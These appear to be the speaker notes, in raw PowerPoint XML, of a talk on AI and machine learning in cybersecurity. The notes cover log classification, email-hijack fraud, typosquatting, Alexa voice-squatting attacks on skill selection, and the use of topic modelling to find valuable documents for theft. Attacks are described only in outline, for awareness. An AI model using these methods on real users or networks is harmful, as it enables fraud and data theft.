            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11574792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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24796151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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14112628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data we are looking at here is a simplified view of my log files. I am looking at the process, command and object on the different axis. I have labeled three combinations of those as red, blue &amp; yellow. What the classifier does is to start with a random unlabeled point. It then randomly walks to a random close point and check if that is labeled. If not continues walking to next point. When it reaches a label ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>red,yellow,blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) it labels the starting point the same color. Lets see this in action.</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EB0847-AF8B-40AF-888B-A4889A5DFCA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66806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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5977292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no cliché picture of a crystal ball rather a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Sangoma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> reading the bones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Let’s draw some analogies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41348515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Feature based attacks show Excel and then show them results from Topic modelling on my own laptop… Can even show the video. Also talk about how Topic modelling is actually the future of DLP at scale….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10439461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166" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>Marketing guys talk about AI, most practitioners will be specific. So AI is generally an agent that has the ability to perceive its environment and uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
              <a:t>alogorithms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t> ( normally machine learning ) to make decisions to maximise it success function. So an autonomous car will sense its environment and make decisions to maximise it chance of getting from point A to B safely and legally. ML is a part of AI as is Deep Learning a part of ML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10966626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http://www.independent.ie/business/personal-finance/property-mortgages/home-buyers-stand-to-lose-thousands-in-new-cyberattack-35424312.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cybercriminals are hacking the email accounts of Irish solicitors in an attempt to steal tens of thousands of euro from unsuspecting home buyers, the Sunday Independent has learned.</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The activity typically takes place on a Friday afternoon, when the scammers know client accounts are likely to hold large amounts of cash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"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EB0847-AF8B-40AF-888B-A4889A5DFCA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864045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On average, if you intend to register a new domain, it should cost you anywhere between $10- $15 a year.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://startbloggingonline.com/how-much-is-a-domain-name/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"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EB0847-AF8B-40AF-888B-A4889A5DFCA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939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http://tools.seobook.com/spelling/keywords-typos.cgi</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EB0847-AF8B-40AF-888B-A4889A5DFCA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18197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On average, if you intend to register a new domain, it should cost you anywhere between $10- $15 a year.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://startbloggingonline.com/how-much-is-a-domain-name/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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EB0847-AF8B-40AF-888B-A4889A5DFCA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61424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On average, if you intend to register a new domain, it should cost you anywhere between $10- $15 a year.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://startbloggingonline.com/how-much-is-a-domain-name/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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EB0847-AF8B-40AF-888B-A4889A5DFCA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52558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a:t>a.k.a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Voice Squatting and Masquerading</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With thanks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" dirty="0"/>
              <a:t>Nan Zhang1 , Xianghang Mi1 , Xuan Feng1,2, XiaoFeng Wang1 , Yuan Tian3 , and Feng Qian1</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https://arxiv.org/pdf/1805.01525.pdf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dirty="0"/>
              <a:t>Virtual Personal Assistants become smarter by having access to skills market</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Note Skills are not downloaded they are available to the device via the market</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The skills are invoked by voice commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Difficult to authenticate voice especially in noisy home environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Amazon has 25,000 skills in marketplace at the moment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Skills are invoked using voice commands but not certain which skill will be chosen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Evidence seem to indicate that longest voice command matching skill is invoked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10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1066920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166" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Alexa chooses one of the skills based on some undisclosed policies (possibly random as observed in research). When a different but similar name is called, however, longest string match is used to find the skill. For example, “Tell me funny cat facts” will trigger funny cat facts rather than cat facts.</a:t>
            </a:r>
          </a:p>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EB0847-AF8B-40AF-888B-A4889A5DFCA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8075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Feature based attacks show Excel and then show them results from Topic modelling on my own laptop… Can even show the video. Also talk about how Topic modelling is actually the future of DLP at scale….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390761808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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38984590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HTA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3305283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14333" marR="0" lvl="2" indent="0" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>With supervised learning we have lots of data with labels and I am trying to create a mathematical model that will correctly predict the label given the data on the training set. We normally divide our training set into two one for training and one for validation. We train the model with one part and then check the accuracy with the other part. But here is the thing in cybersecurity we do not have good training data. We have lots of good data but not lots of examples of bad data… And all the suppliers use the same sets which are very predictable and not representative…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914333" marR="0" lvl="2" indent="0" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914333" marR="0" lvl="2" indent="0" algn="l" defTabSz="457166"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Meanwhile, Intrusion Detection Systems (IDSs) and Intrusion Prevention Systems (IPSs) are one of the most important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> tools against the sophisticated and ever-growing network attacks. Due to the lack of adequate dataset, anomaly-based approaches in intrusion detection systems are suffering from accurate deployment, analysis and evaluation. There exist a number of such datasets such as DARPA98, KDD99, ISC2012, and ADFA13 that have been used by the researchers to evaluate the performance of their proposed intrusion detection and intrusion prevention approaches. Based on our study over eleven available datasets since 1998, many such datasets are out of date and unreliable to use. Some of these datasets suffer from lack of traffic diversity and volumes, some of them do not cover the variety of attacks, while others anonymized packet information and payload which cannot reflect the current trends, or they lack feature set and metadata. This paper produces a reliable dataset that contains benign and seven common attack network flows, which meets real world criteria and is publicly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>avaliable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. Consequently, the paper evaluates the performance of a comprehensive set of network traffic features and machine learning algorithms to indicate the best set of features for detecting the certain attack categories.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914333" marR="0" lvl="2" indent="0" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314006535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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2108954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Imagine a threat actor being able to accurately pinpoint what is covered in documents on every endpoint he can get access to . This would make for very selective extraction of very valuable documents</a:t>
            </a:r>
          </a:p>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EB0847-AF8B-40AF-888B-A4889A5DFCA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449633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GB" dirty="0"/>
              <a:t>Running topic modelling on all the Word  files on my own desktop (2 minutes to analyse 800 files )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Is pretty clear what I do and what I write about a lot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Is scarily accurate and only took 45 lines of python code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Will give threat actors unparoled insight into the documents on a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Is a easy way to very quickly identify desktops with valuable information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>And this feature will be available on desktops soon…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>BTW this would be a much smarter way to implement DLP in future. No doubt coming to a hyped up datasheet near you soon !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184172038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Now with these new issues I discussed the challenge was that they were mostly disclosed in academic papers first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>With bugs we all know the rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>With AI &amp; ML things are a bit different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Algorithm weaknesses affect multiple applications  including IOT and imbedded systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>No culture of responsible disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>AI &amp; ML innovation is mostly in the academic domain at the moment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Who do you notify ( example of Neural Nets with image recognition )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There is a movement to create rules for responsible disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176844456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Every journey will be different… Lets start with my journey and will then share my learnings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>So I graduated as an Electrical Engineer in 1989 went into Engineering and programming until I saw this Internet thing and though this may be big. I set up a few </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> businesses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Towards the end 2014 I had the same thought around AI &amp; Machine Learning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
